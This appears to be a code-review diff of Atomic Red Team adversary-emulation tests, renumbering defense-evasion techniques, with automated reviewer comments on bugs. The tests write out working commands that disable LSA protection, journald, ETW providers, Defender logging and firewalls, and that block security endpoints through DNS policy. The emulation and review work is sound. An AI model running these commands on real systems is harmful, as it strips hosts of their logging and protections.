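Review bot: Atomic Test #64 and #66 are titled "on FreeBSD Host" but declare `**Supported Platforms:** Linux`, and their cleanup uses the BSD form `sed -i "" '/#art_test_1562_006_1/d' ...`, which GNU sed does not accept (it reads the empty string as the script and the expression as a filename), so on the platform they claim to support the cleanup fails and on FreeBSD, where they would work, they are never offered; set the platform to freebsd. Smaller points in the same hunk: in #76 the description says the test will "respond with 127.0.0.1" for endpoint.security.microsoft.com, but `Add-DnsClientNrptRule -Namespace ... -NameServers 127.0.0.1` does not forge an answer, it sends queries for that namespace to a resolver at 127.0.0.1, so the observable effect is failed resolution rather than a spoofed A record (and `Clear-DnsClientCache` runs twice in the cleanup, once inside the try block and once after it). In #63 the auditd branch is guarded with `if [ -f ... ]` while the audisp and libaudit lines are not, so `sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}` errors on hosts without /etc/audisp; guard them the same way. The Linux cleanups in #63 and #65 also delete the last line unconditionally (`sed -i '$ d'`) instead of deleting the marker line, so running cleanup without the attack, or after running the attack twice, strips a real configuration line; match the marker as the FreeBSD cleanups do. Lastly, the `#art_test_1562_006_*` markers inherited from the deleted T1562.006 file now live under T1685; consider renaming them so a responder who finds one in a config file can trace it to the right atomic.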
@@ -1,6 +1,53 @@
attack_technique: T1562.001
display_name: 'Impair Defenses: Disable or Modify Tools'
attack_technique: T1685
display_name: 'Disable or Modify Tools'
atomic_tests:
- name: Windows Disable LSA Protection
auto_generated_guid: 40075d5f-3a70-4c66-9125-f72bee87247d
description: |
The following Atomic adds a registry entry to disable LSA Protection.
The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data.
Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/
supported_platforms:
- windows
executor:
command: |
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
cleanup_command: |
reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: Disable journal logging via systemctl utility
auto_generated_guid: c3a377f9-1203-4454-aa35-9d391d34768f
description: |
The atomic test disables the journal logging using built-in systemctl utility
supported_platforms:
- linux
executor:
command: |
sudo systemctl stop systemd-journald #disables journal logging
cleanup_command: |
sudo systemctl start systemd-journald #starts journal service
sudo systemctl enable systemd-journald #starts journal service automatically at boot time
name: sh
elevation_required: true
- name: Disable journal logging via sed utility
auto_generated_guid: 12e5551c-8d5c-408e-b3e4-63f53b03379f
description: |
The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk
supported_platforms:
- linux
executor:
command: |
sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
cleanup_command: |
sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
sudo systemctl restart systemd-journald #restart the journal service
name: sh
elevation_required: true
- name: Disable syslog
auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8
description: |
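Review bot: the cleanup for "Windows Disable LSA Protection", `reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f`, removes the value instead of restoring it, so on a host that had RunAsPPL set before the test, cleanup leaves LSA protection off; record the existing value before the attack and restore it, or document that cleanup does not re-enable protection. In "Disable journal logging via sed utility", `sed -i 's/Storage=auto/Storage=none/'` only matches an existing uncommented `Storage=auto` line; a stock journald.conf ships that setting commented out as `#Storage=auto`, so on a default install the command is a silent no-op and the test reports success without changing anything. Match `^#\?Storage=.*` instead, and restart journald in the attack as well as the cleanup, since the cleanup's `systemctl restart systemd-journald` is what makes a file edit take effect. In "Disable journal logging via systemctl utility", the attack only runs `systemctl stop` but the cleanup runs `enable` as well as `start`; either drop the `enable` or add the matching `disable` to the attack so cleanup restores exactly the state the test changed.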
@@ -246,7 +293,7 @@ atomic_tests:
sysmon_exe:
description: The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH)
type: path
default: PathToAtomicsFolder\T1562.001\bin\sysmon.exe
default: PathToAtomicsFolder\T1685\bin\sysmon.exe
dependency_executor_name: powershell
dependencies:
- description: |
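Review bot: the sysmon default now points at `PathToAtomicsFolder\T1685\bin\sysmon.exe`; the description says the path is ignored when sysmon.exe is on PATH, so this is low risk, but make sure the `bin` directory moves from T1562.001 to T1685 in the same commit, otherwise the dependency check fails on hosts that rely on the bundled binary.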
@@ -1370,3 +1417,272 @@ atomic_tests:
sysctl -w kernel.randomize_va_space=2
name: bash
elevation_required: true
- name: 'Auditing Configuration Changes on Linux Host'
auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
description: |
Emulates modification of auditd configuration files
supported_platforms:
- linux
input_arguments:
audisp_config_file_name:
description: The name of the audispd configuration file to be changed
type: string
default: audispd.conf
auditd_config_file_name:
description: The name of the auditd configuration file to be changed
type: string
default: auditd.conf
libaudit_config_file_name:
description: The name of the libaudit configuration file to be changed
type: string
default: libaudit.conf
executor:
command: |
sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
cleanup_command: |
sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ d' /etc/#{auditd_config_file_name}
else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ d' /etc/#{libaudit_config_file_name}
name: bash
elevation_required: true
- name: 'Auditing Configuration Changes on FreeBSD Host'
auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd
description: |
Emulates modification of auditd configuration files
supported_platforms:
- linux
input_arguments:
auditd_config_file_name:
description: The name of the auditd configuration file to be changed
type: string
default: audit_event
executor:
command: |
echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
cleanup_command: |
sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
name: sh
elevation_required: true
- name: 'Logging Configuration Changes on Linux Host'
auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
description: |
Emulates modification of syslog configuration.
supported_platforms:
- linux
input_arguments:
syslog_config_file_name:
description: The name of the syslog configuration file to be changed
type: string
default: syslog.conf
rsyslog_config_file_name:
description: The name of the rsyslog configuration file to be changed
type: string
default: rsyslog.conf
syslog_ng_config_file_name:
description: The name of the syslog-ng configuration file to be changed
type: string
default: syslog-ng.conf
executor:
command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
cleanup_command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ d' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ d' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
name: bash
elevation_required: true
- name: 'Logging Configuration Changes on FreeBSD Host'
auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8
description: |
Emulates modification of syslog configuration.
supported_platforms:
- linux
input_arguments:
syslog_config_file_name:
description: The name of the syslog configuration file to be changed
type: string
default: syslog.conf
executor:
command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fi
cleanup_command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
fi
name: sh
elevation_required: true
- name: Disable Powershell ETW Provider - Windows
auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84
description: This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
supported_platforms:
- windows
input_arguments:
ps_exec_location:
description: Location of PSExec.
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe
session:
description: The session to disable.
type: string
default: EventLog-Application
provider:
description: The provider to disable.
type: string
default: Microsoft-Windows-Powershell
dependency_executor_name: powershell
dependencies:
- description: PSExec must be installed on the machine.
prereq_command: if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
get_prereq_command: |-
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
executor:
command: cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
cleanup_command: cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
name: powershell
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Registry (cmd)
auto_generated_guid: 8a4c33be-a0d3-434a-bee6-315405edbd5b
description: Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
supported_platforms:
- windows
executor:
command: REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0
cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
name: command_prompt
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Registry (powershell)
auto_generated_guid: 19c07a45-452d-4620-90ed-4c34fffbe758
description: Disables ETW for the .NET Framework using PowerShell to update the Windows registry
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
name: powershell
elevation_required: true
- name: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
auto_generated_guid: f6df0b8e-2c83-44c7-ba5e-0fa4386bec41
description: |
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
cleanup_command: |
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02
description: |
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
supported_platforms:
- windows
executor:
command: |
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force
cleanup_command: |
Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
auto_generated_guid: fdac1f79-b833-4bab-b4a1-11b1ed676a4b
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required.
supported_platforms:
- windows
executor:
command: REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
cleanup_command: REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1
name: command_prompt
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
auto_generated_guid: b42c1f8c-399b-47ae-8fd8-763181395fee
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required.
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
cleanup_command: Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
name: powershell
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
auto_generated_guid: 110b4281-43fe-405f-a184-5d8eaf228ebf
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required.
supported_platforms:
- windows
executor:
command: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
cleanup_command: REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
name: command_prompt
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
auto_generated_guid: 4d61779d-be7f-425c-b560-0cafb2522911
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required.
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
cleanup_command: Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled
name: powershell
elevation_required: true
- name: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
auto_generated_guid: 1174b5df-2c33-490f-8854-f5eb80c907ca
description: Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com.
supported_platforms:
- windows
executor:
command: |-
Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Clear-DnsClientCache
cleanup_command: |-
try {
# Get all current NRPT rules
$DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }
# Remove each NRPT rule
foreach ($rule in $DnsClientNrptRules) {
Remove-DnsClientNrptRule -Name $rule.Name -Force
}
# Clear DNS client cache
Clear-DnsClientCache
Write-Host "All NRPT rules have been removed and the DNS cache has been cleared."
}
catch {
Write-Host "An error occurred: $_"
}
Clear-DnsClientCache
name: powershell
elevation_required: true
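Review bot: this hunk deletes the entire T1562.006 (Indicator Blocking) atomics file with no renamed replacement visible, whereas every other file in this commit (T1562.004, T1562.009, T1562.010, T1562.003) is kept and re-pointed at its new ATT&CK v19 identifier; confirm that a renamed copy of these tests exists elsewhere in the change set, otherwise the auditd/syslog, logman ETW provider, .NET `ETWEnabled` / `COMPlus_ETWEnabled` registry and NRPT DNS-blocking tests removed here are lost rather than migrated. If a renamed file does exist, the `PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe` default and the other paths in it should be checked the same way the `T1562.004` paths are updated to `T1686` below.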
@@ -1,4 +1,4 @@
# T1562.004 - Impair Defenses: Disable or Modify System Firewall
# T1686 - Disable or Modify System Firewall
## Description from ATT&CK
@@ -10,7 +10,7 @@
>
> In ESXi, firewall rules may be modified directly via the esxcli command line interface (e.g., via `esxcli network firewall set`) or via the vCenter user interface.(Citation: Trellix Rnasomhouse 2024)(Citation: Broadcom ESXi Firewall)
[Source](https://attack.mitre.org/techniques/T1562/004)
[Source](https://attack.mitre.org/techniques/T1686)
## Atomic Tests
@@ -159,7 +159,7 @@ This test will attempt to allow an executable through the system firewall locate
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_file_path | path to exe file | path | PathToAtomicsFolder&#92;T1562.004&#92;bin&#92;AtomicTest.exe|
| exe_file_path | path to exe file | path | PathToAtomicsFolder&#92;T1686&#92;bin&#92;AtomicTest.exe|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
@@ -758,13 +758,13 @@ Adversaries may disable the ESXI firewall via ESXCLI
#### Attack Commands: Run with `command_prompt`!
```cmd
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_disable_firewall.txt
```
#### Cleanup Commands
```cmd
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_enable_firewall.txt
```
#### Dependencies: Run with `powershell`!
@@ -1,5 +1,5 @@
attack_technique: T1562.004
display_name: 'Impair Defenses: Disable or Modify System Firewall'
attack_technique: T1686
display_name: 'Disable or Modify System Firewall'
atomic_tests:
- name: Disable Microsoft Defender Firewall
auto_generated_guid: 88d05800-a5e4-407e-9b53-ece4174f197f
@@ -79,7 +79,7 @@ atomic_tests:
exe_file_path:
description: path to exe file
type: path
default: PathToAtomicsFolder\T1562.004\bin\AtomicTest.exe
default: PathToAtomicsFolder\T1686\bin\AtomicTest.exe
executor:
command: |
Copy-Item "#{exe_file_path}" -Destination "C:\Users\$env:UserName" -Force
@@ -473,9 +473,9 @@ atomic_tests:
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
executor:
command: |
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_disable_firewall.txt
cleanup_command: |
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_enable_firewall.txt
name: command_prompt
elevation_required: false
- name: Set a firewall rule using New-NetFirewallRule
@@ -1,4 +1,4 @@
# T1562.009 - Impair Defenses: Safe Boot Mode
# T1688 - Safe Mode Boot
## Description from ATT&CK
@@ -8,7 +8,7 @@
>
> Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)
[Source](https://attack.mitre.org/techniques/T1562/009)
[Source](https://attack.mitre.org/techniques/T1688)
## Atomic Tests
@@ -1,5 +1,5 @@
attack_technique: T1562.009
display_name: 'Impair Defenses: Safe Boot Mode'
attack_technique: T1688
display_name: 'Safe Mode Boot'
atomic_tests:
- name: Safe Mode Boot
auto_generated_guid: 2a78362e-b79a-4482-8e24-be397bce4d85
@@ -1,4 +1,4 @@
# T1562.010 - Impair Defenses: Downgrade Attack
# T1689 - Downgrade Attack
## Description from ATT&CK
@@ -8,7 +8,7 @@
>
> Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade) On Windows systems, adversaries may downgrade the boot manager to a vulnerable version that bypasses Secure Boot, granting the ability to disable various operating system security mechanisms.(Citation: SafeBreach)
[Source](https://attack.mitre.org/techniques/T1562/010)
[Source](https://attack.mitre.org/techniques/T1689)
## Atomic Tests
@@ -77,7 +77,7 @@ An adversary will change the VIB acceptance level to CommunitySupported to downg
| vm_user | Specify the privilege user account on ESXi Server | string | root|
| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
| plink_file | Path to plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
| cli_script | Path to script with commands to change acceptance level | path | PathToAtomicsFolder&#92;T1562.010&#92;src&#92;esx_community_supported.txt|
| cli_script | Path to script with commands to change acceptance level | path | PathToAtomicsFolder&#92;T1689&#92;src&#92;esx_community_supported.txt|
#### Attack Commands: Run with `command_prompt`!
@@ -1,5 +1,5 @@
attack_technique: T1562.010
display_name: 'Impair Defenses: Downgrade Attack'
attack_technique: T1689
display_name: 'Downgrade Attack'
atomic_tests:
- name: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI
auto_generated_guid: 062f92c9-28b1-4391-a5f8-9d8ca6852091
@@ -65,7 +65,7 @@ atomic_tests:
cli_script:
description: Path to script with commands to change acceptance level
type: path
default: PathToAtomicsFolder\T1562.010\src\esx_community_supported.txt
default: PathToAtomicsFolder\T1698\src\esx_community_supported.txt
dependency_executor_name: powershell
dependencies:
- description: |
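Review bot: the new `cli_script` default in this hunk reads `PathToAtomicsFolder\T1698\src\esx_community_supported.txt`, but the technique is renamed to T1689 everywhere else in this commit (`attack_technique: T1689` in the same file and `T1689&#92;src&#92;esx_community_supported.txt` in the README table), so the ESXi acceptance-level test will fail to find its script; change the default to `PathToAtomicsFolder\T1689\src\esx_community_supported.txt` and regenerate the README so the table and the YAML stay in sync.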
@@ -1,4 +1,4 @@
# T1562.003 - Impair Defenses: Impair Command History Logging
# T1690 - Prevent Command History Logging
## Description from ATT&CK
@@ -12,7 +12,7 @@
>
> Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. <code>no logging</code>).
[Source](https://attack.mitre.org/techniques/T1562/003)
[Source](https://attack.mitre.org/techniques/T1690)
## Atomic Tests
@@ -1,5 +1,5 @@
attack_technique: T1562.003
display_name: 'Impair Defenses: Impair Command History Logging'
attack_technique: T1690
display_name: 'Prevent Command History Logging'
atomic_tests:
- name: Disable history collection
auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5